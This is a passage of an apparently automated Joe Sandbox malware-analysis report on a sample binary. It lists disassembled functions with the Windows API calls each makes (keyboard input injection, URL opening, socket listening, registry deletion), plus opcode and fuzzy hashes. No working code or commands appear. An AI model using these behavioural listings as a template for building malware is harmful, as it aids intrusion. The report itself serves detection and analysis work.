Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: c0b67b95e1e34fc3bf8bb2b781763a4fcff93ffbe2da7c683d3f5e8bdee45d69
Instruction ID: a872c2fd0ade0861a4ee5fe7bde3df0e9a91f688ff935bec928f73f82ec54404
Opcode Fuzzy Hash: c0b67b95e1e34fc3bf8bb2b781763a4fcff93ffbe2da7c683d3f5e8bdee45d69
Instruction Fuzzy Hash: 4AD0A7744207139FC720BFA0F80C603BAF8AB03714B10441BE44BE2690DBB0C8908F50

Function 00259B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36ae326893f5f43192677171c7ce179a771782e38c123fa544b5643c482dc481
Instruction ID: 46a83adbba978141289227b4cd16ba59e60da49a846599f5a314e8b90669800b
Opcode Fuzzy Hash: 36ae326893f5f43192677171c7ce179a771782e38c123fa544b5643c482dc481
Instruction Fuzzy Hash: C0C19C71A2021AEFDB04DF94C884AAEB7B5FF48702F104599EC06EB251D730EE95DB94

Function 0027AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0027AAB4
CoUninitialize.OLE32 ref: 0027AABF

Part of subcall function 00260213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0026027B

VariantInit.OLEAUT32(?), ref: 0027AACA
VariantClear.OLEAUT32(?), ref: 0027AD9D

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: ae9256c17db139c8c0fc9e3ac025f655cb9797e3c5e218bc0529819bdfe8ef34
Instruction ID: ef40a6835f69ca7360c439525384da3284a828e72f692a9dc80b00d170dc825a
Opcode Fuzzy Hash: ae9256c17db139c8c0fc9e3ac025f655cb9797e3c5e218bc0529819bdfe8ef34
Instruction Fuzzy Hash: 3FA13875224711AFCB11DF54C491A1EB7E4BF88720F148449FA9A9B3A2CB70ED54CB86

Function 002591CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002591DD
SysAllocString.OLEAUT32(?), ref: 00259286
VariantCopy.OLEAUT32 ref: 002592B5
VariantClear.OLEAUT32(?), ref: 002592DC

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 1e797f7007e7e041c566826309f35e878260a8b4ed7f6527502a640e8df7a2f1
Instruction ID: 92d84de04b8af122d84860ceb47019fb043f333a95e008318f8cc10dad8c7e7d
Opcode Fuzzy Hash: 1e797f7007e7e041c566826309f35e878260a8b4ed7f6527502a640e8df7a2f1
Instruction Fuzzy Hash: 40518430634306EBDB249F65D49572EB3E9EF45311F20886FE946C72D1DB7498E88B09

Function 0024365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 002436B7
_memcpy_s.LIBCMT ref: 00243729
__filbuf.LIBCMT ref: 002437AA
_memset.LIBCMT ref: 002437EE

Part of subcall function 00247C0E: __getptd_noexit.LIBCMT ref: 00247C0E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: a0af4cbef1edaf219f1b90731730731f907a4cb417d1463e8a45b7d6116c01a1
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: 4B5195B0A20207EBDB2CDF69C88566EB7A5AF40320F258729F875962D0D7709F708F44

Function 0028C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(01856760,?), ref: 0028C544
ScreenToClient.USER32(?,00000002), ref: 0028C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0028C5DA

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 582f024b135c86923a65feb4f67e019a334172ec75e0c6d9aa5a204add6b48fc
Instruction ID: 11ef594dd70a6bb35fc99d76e46c27c2b4705612c7dad8d8c5e6134ab3f7047e
Opcode Fuzzy Hash: 582f024b135c86923a65feb4f67e019a334172ec75e0c6d9aa5a204add6b48fc
Instruction Fuzzy Hash: DD518079911105EFCF10EF68D8849AE77B9EF45320F648269F925AB2D0D730ED91CBA0

Function 0025C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0025C462
__itow.LIBCMT ref: 0025C49C

Part of subcall function 0025C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0025C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0025C505
__itow.LIBCMT ref: 0025C55A

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 3946a8edb02156d74e05b2e6ef466f85d72ed72014b1c90f697d4e4094df0aa3
Instruction ID: c625079fa6353611f10b46fe940a5e46a76573746d0c8b8ceb43b1d21ef9cd40
Opcode Fuzzy Hash: 3946a8edb02156d74e05b2e6ef466f85d72ed72014b1c90f697d4e4094df0aa3
Instruction Fuzzy Hash: DA410230A10319AFDF20DF94D846FEE7BB9AF49700F100019F905A3281EB709A69CFA5

Function 0026390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00263966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00263982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 002639EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00263A4D

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: e997a323fd6d1abd566e485174202387fb670a508eed92d448543dcfc96353ef
Instruction ID: 43600c9fc1fab1531b87724c8fa3540861c8ee6b3a4d4c910810f987b308e067
Opcode Fuzzy Hash: e997a323fd6d1abd566e485174202387fb670a508eed92d448543dcfc96353ef
Instruction Fuzzy Hash: 31410970E25648AAEF20CF6498097FDBBB59B55310F04015AE4C2922C1CBB49EE5DF65

Function 0028B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0028B5D1

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: cfd3c48febcd7f582ae66363656f56a4262e369f51c0ba2df15b2f8e3f5c0132
Instruction ID: bc5a534afb47f31e4b9c819de8d65524f01973ffa50ef5ca31cca402e9e6fde0
Opcode Fuzzy Hash: cfd3c48febcd7f582ae66363656f56a4262e369f51c0ba2df15b2f8e3f5c0132
Instruction Fuzzy Hash: 2931247C632115BFEF32AF18CC88FA83768EB06310F904119F602D66E2D774A9708B41

Function 0028D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0028D807
GetWindowRect.USER32(?,?), ref: 0028D87D
PtInRect.USER32(?,?,0028ED5A), ref: 0028D88D
MessageBeep.USER32(00000000), ref: 0028D8FE

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b8b4f6a374107e93afffb97984f0301b72d0e703d88113072e0438e0d275b300
Instruction ID: ed5542eb530e7c629910899de47984a7abd1229a075d02ad8284fc04b0b20e7c
Opcode Fuzzy Hash: b8b4f6a374107e93afffb97984f0301b72d0e703d88113072e0438e0d275b300
Instruction Fuzzy Hash: 00419D78A12219DFDB11EF58E884B697BB5FF49310F1881A9E4158B2D0D730E96ACF40

Function 00263A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00263AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00263AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00263B34
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00263B92

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 668b0981759261b420b94238404dc796a62518515a58a10d4760584c0d5974f4
Instruction ID: 2d72c095643300f11ad362bf9ddae3c1cd1cb94bbe9c07ac9f97b133a9cdc02b
Opcode Fuzzy Hash: 668b0981759261b420b94238404dc796a62518515a58a10d4760584c0d5974f4
Instruction Fuzzy Hash: 5F312831D20259AEFF20CF648819BFD7BA5AB56318F04015AE481931D1C7758FE5DB61

Function 00254004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00254038
__isleadbyte_l.LIBCMT ref: 00254066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00254094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002540CA

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: ea6633aa351ec2ab36c4690b5cb2d358a458eaf12e0be57ff5575c83b777ea25
Instruction ID: 12e48c44419ae0ec1ab127e471c54728f7f82561894fb243a9e2f0fec343368e
Opcode Fuzzy Hash: ea6633aa351ec2ab36c4690b5cb2d358a458eaf12e0be57ff5575c83b777ea25
Instruction Fuzzy Hash: 6B31C230524206EFDB29AF65C844BBABBA5BF41316F254029EE658B0D0E731D8F4DB94

Function 00287CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00287CB9

Part of subcall function 00265F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00265F6F
Part of subcall function 00265F55: GetCurrentThreadId.KERNEL32 ref: 00265F76
Part of subcall function 00265F55: AttachThreadInput.USER32(00000000,?,0026781F), ref: 00265F7D

GetCaretPos.USER32(?), ref: 00287CCA
ClientToScreen.USER32(00000000,?), ref: 00287D03
GetForegroundWindow.USER32 ref: 00287D09

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 2789cf4a7bb2232d72029bb090fbcb99723b48e93c8ba46c8a4f7f59fc3f794e
Instruction ID: 28094cdf0f5271fb35e798c57f00424919093e0fe4afb8acfd22326bebe2d650
Opcode Fuzzy Hash: 2789cf4a7bb2232d72029bb090fbcb99723b48e93c8ba46c8a4f7f59fc3f794e
Instruction Fuzzy Hash: 89312FB1910108AFDB10EFA5DC459EFFBF9EF59310F118466E815E3211DA319E558FA0

Function 0028F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0023B34E: GetWindowLongW.USER32(?,000000EB), ref: 0023B35F

GetCursorPos.USER32(?), ref: 0028F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0029E4C0,?,?,?,?,?), ref: 0028F226
GetCursorPos.USER32(?), ref: 0028F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0029E4C0,?,?,?), ref: 0028F2A6

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 7f1891ab062e85bd869ec8f558ff43512bb1e0f2af26e6577620c0b0fa03352d
Instruction ID: 38c6820cf538b11cecaac1dfd01ac8364481941184852687eaea98452b3f7dd4
Opcode Fuzzy Hash: 7f1891ab062e85bd869ec8f558ff43512bb1e0f2af26e6577620c0b0fa03352d
Instruction Fuzzy Hash: BB21A03D611018AFCB159F94D858EEABBB9EF0A311F444069FD054B2E5D7309960DB60

Function 0027431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00274358

Part of subcall function 002743E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00274401
Part of subcall function 002743E2: InternetCloseHandle.WININET(00000000), ref: 0027449E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 657a96bb7f9d2d921e65ecd59fa1026c0856d7bf621ea15d89bdefa4909a34af
Instruction ID: 75e6d0d4c26d7edd501368d7f5795612fe1cd50715ade6732e4265b53069c963
Opcode Fuzzy Hash: 657a96bb7f9d2d921e65ecd59fa1026c0856d7bf621ea15d89bdefa4909a34af
Instruction Fuzzy Hash: EB21C635211616BFDB15AF60DC00FBBB7A9FF49710F20801AFA1D96550DBB198719B90

Function 00288A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00288AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00288AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00288ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00288ADC

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: c256de24804de6f80c0a314908015fcf65fddeab1dc16320a5c7e66926ab5b8b
Instruction ID: bc6f1c644b0b2a1a47e5a5d31f628adee16dcbb1762cc429f08e85d78e5eb168
Opcode Fuzzy Hash: c256de24804de6f80c0a314908015fcf65fddeab1dc16320a5c7e66926ab5b8b
Instruction Fuzzy Hash: 99119335266111BFE718AB54DC05FBA779DBF89720F14411AF916C72E2CF74AC208B94

Function 00278A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00278AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00278AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00278AFF
WSAGetLastError.WSOCK32(00000000), ref: 00278B16

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: f9fb3bc62e9aaee1ae335ccec7af846829f1072c55de80e9fbbeba46bfa7f209
Instruction ID: 3878864c523ca8791ff52d3b050c97976e321df89651f8d5cfa3408ac9f2798d
Opcode Fuzzy Hash: f9fb3bc62e9aaee1ae335ccec7af846829f1072c55de80e9fbbeba46bfa7f209
Instruction Fuzzy Hash: A821A871A001249FC7159F68DC89AAEBBFCEF4A710F00816AF84AD7291DB74D945CF90

Function 00260AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00261E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00260ABB,?,?,?,0026187A,00000000,000000EF,00000119,?,?), ref: 00261E77
Part of subcall function 00261E68: lstrcpyW.KERNEL32(00000000,?,?,00260ABB,?,?,?,0026187A,00000000,000000EF,00000119,?,?,00000000), ref: 00261E9D
Part of subcall function 00261E68: lstrcmpiW.KERNEL32(00000000,?,00260ABB,?,?,?,0026187A,00000000,000000EF,00000119,?,?), ref: 00261ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0026187A,00000000,000000EF,00000119,?,?,00000000), ref: 00260AD4
lstrcpyW.KERNEL32(00000000,?,?,0026187A,00000000,000000EF,00000119,?,?,00000000), ref: 00260AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,0026187A,00000000,000000EF,00000119,?,?,00000000), ref: 00260B2E

Strings

cdecl, xrefs: 00260B25

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: c3160250583586e9eb8a4205ee07dcdb7286285a1b68288b262cd03f0f96860c
Instruction ID: ed93328e48f6aaa7e28ae0ec0b501d39b2803b96996a7b2b34b074fbda5d0b37
Opcode Fuzzy Hash: c3160250583586e9eb8a4205ee07dcdb7286285a1b68288b262cd03f0f96860c
Instruction Fuzzy Hash: BC119636220305AFDB259F24DC45D7F77A9FF46354B90806AE906CB250EB71D8A0D7E0

Function 00252F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

